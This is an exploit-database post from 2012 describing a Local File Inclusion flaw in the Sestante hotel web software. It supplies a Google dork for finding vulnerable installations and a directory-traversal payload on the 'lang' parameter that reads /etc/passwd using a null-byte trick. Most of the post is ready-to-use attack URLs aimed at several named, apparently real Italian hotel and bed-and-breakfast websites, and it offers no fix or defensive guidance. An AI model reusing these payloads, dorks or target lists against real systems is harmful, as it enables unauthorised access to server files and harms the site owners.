Home / exploits Sestante Local File Inclusion
Posted on 30 November 2012
# Exploit Title: Sestante Local File Inclusion Vulnerability # # Google Dork: inurl:special_offers.php?lang= 0r inurl:special_offers.php?lang= intext:Powered by Sestante # # Date: 2012-29-11 # Exploit Author: Ashiyane Digital Security Team # # Discovered by : Amirh03in # # Tested on: Linux # # Security Risk : HigH # # Category: Web Application # =================================== =================================== # Location: http://site.com/special_offers.php?lang=[Directory or file] # # Demo : http://www.locandalelisa.it/special_offers.php?lang=../../../../../../../../../../../../etc/passwd%00 # # http://demo2.hoteltest.it/special_offers.php?lang=../../../../../../../../../../../../etc/passwd%00 # # http://www.castellodioviglio.it/special_offers.php?lang=../../../../../../../../../../../../etc/passwd %00 # # http://www.residenzelamongolfiera.it/special_offers.php?lang=../../../../../../../../../../../../etc/passwd%00 # # http://www.bedandbreakfastbellini.it/special_offers.php?lang=../../../../../../../../../../../../etc/passwd%00 # ======================================= ======================================= Greetz to: My Lord ALLAH =======================================
